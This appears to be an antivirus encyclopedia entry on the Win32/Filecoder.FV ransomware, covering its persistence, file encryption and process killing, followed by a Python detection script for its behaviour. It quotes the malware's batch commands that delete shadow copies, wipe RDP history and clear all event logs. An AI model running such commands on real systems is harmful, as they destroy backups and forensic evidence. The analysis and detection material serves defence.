Win32/Filecoder [Threat Name]

Win32/Filecoder.FV [Threat Variant Name]

Category: trojan
Size: 311296 B
Detection created: Jan 12, 2017
Detection database version: 14758
Aliases:
  • Trojan-Ransom.Win32.Blocker.kfgf (Kaspersky)
  • Trojan.Encoder.11539 (Dr.Web)
  • Ransom:Win32/Ergop.A (Microsoft)
  • Ransom.CryptXXX (Symantec)
Short description

Win32/Filecoder.FV is a trojan that encrypts files on local drives. To decrypt the files, the user is asked to send a certain amount of money via the Bitcoin payment service.

Installation

When executed, the trojan copies itself into the following location:

  • %allusersprofile%\%malwarefilename%

In order to be executed on system start, the trojan sets the following Registry entry:

  • [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    • "CertificatesCheck" = "%malwarefilepath%"
Payload information

Win32/Filecoder.FV is a trojan that encrypts files on local drives.


The trojan searches for files matching the following pattern (that is, all files regardless of extension):

  • *.*

It avoids files from the following directories:

  • Avast
  • AVG
  • Avira
  • Chrome
  • Common Files
  • COMODO
  • Dr.Web
  • ESET
  • Internet Explorer
  • Kaspersky Lab
  • McAfee
  • Microsoft
  • Microsoft Help
  • Microsoft Shared
  • Microsoft.NET
  • Movie Maker
  • Mozilla Firefox
  • ntldr
  • NVIDIA Corporation
  • Opera
  • Outlook Express
  • ProgramData
  • spytech software
  • Symantec
  • Symantec_Client_Security
  • sysconfig
  • system volume information
  • Temp
  • Windows
  • Windows App Certification Kit
  • Windows Defender
  • Windows Kits
  • Windows Mail
  • Windows Media Player
  • Windows Multimedia Platform
  • Windows NT
  • Windows Phone Kits
  • Windows Phone Silverlight Kits
  • Windows Photo Viewer
  • Windows Portable Devices
  • Windows Sidebar
  • WindowsPowerShell
  • Wsus
  • YandexBrowser

The trojan encrypts the file content.


The extension of the encrypted files is changed to:

  • %filepath%.crypt

The RSA and DES encryption algorithms are used.


To decrypt the files, the user is asked to send a certain amount of money via the Bitcoin payment service.


When searching the drives, the trojan creates the following file in every folder visited:

  • how_to_back_files.html

It contains the following text:

Other information

The trojan creates the following files:

  • %temp%\__t%variable%.tmp.bat

A string with variable content is used instead of %variable%.


It contains the following text:

  • @echo off
  • vssadmin.exe Delete Shadows /All /Quiet
  • reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
  • reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
  • reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
  • cd %userprofile%\documents\
  • attrib Default.rdp -s -h
  • del Default.rdp
  • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

The file is then executed.
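As an added detection example (not part of the ESET entry), the following Python matches process-creation command lines against the actions of the dropped batch file described above: shadow-copy deletion, RDP history removal, event-log clearing, and execution of the __t%variable%.tmp.bat file from %temp%. The sample events and rule names are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon EID 1 style), not real telemetry.
# Their command lines mirror the dropped __t%variable%.tmp.bat described on this page.
SAMPLE_EVENTS = [
    {"pid": 1201, "cmdline": r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\__t8f3a1.tmp.bat"},
    {"pid": 1202, "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 1203, "cmdline": r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'},
    {"pid": 1204, "cmdline": 'wevtutil.exe cl "Security"'},
    {"pid": 1205, "cmdline": "wevtutil.exe el"},  # enumerating logs alone is benign
    {"pid": 1206, "cmdline": r'reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"'},
]

# Detection rules: (rule name, regex over the command line). Rule names are hypothetical.
RULES = [
    ("shadow_copy_deletion", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("eventlog_clear", re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("rdp_history_wipe", re.compile(
        r'\breg\s+delete\s+"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\', re.I)),
    ("temp_bat_execution", re.compile(r"\\Temp\\__t[^\\\s]*\.tmp\.bat\b", re.I)),
]


def match_event(event):
    """Return the names of every rule whose pattern matches this event's command line."""
    return [name for name, pattern in RULES if pattern.search(event["cmdline"])]


def score_events(events):
    """Group the pids of matching events by rule name; an empty dict means nothing fired."""
    hits = {}
    for ev in events:
        for name in match_event(ev):
            hits.setdefault(name, []).append(ev["pid"])
    return hits


def likely_filecoder_fv(events):
    """Verdict requires both destructive steps of the batch file: shadow-copy deletion
    and event-log clearing. Either one alone also occurs in legitimate administration."""
    hits = score_events(events)
    return "shadow_copy_deletion" in hits and "eventlog_clear" in hits


if __name__ == "__main__":
    for rule, pids in sorted(score_events(SAMPLE_EVENTS).items()):
        print(f"{rule}: pids {pids}")
    print("likely Win32/Filecoder.FV activity:", likely_filecoder_fv(SAMPLE_EVENTS))
```

The combined verdict is the useful signal: deleting shadow copies and clearing every event log within one short-lived batch file is the pattern worth alerting on, while a single match is better treated as a hunting lead.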


The trojan terminates processes with any of the following strings in the name:

  • sql
  • outlook
  • ssms
  • postgre
  • 1c
  • excel
  • word
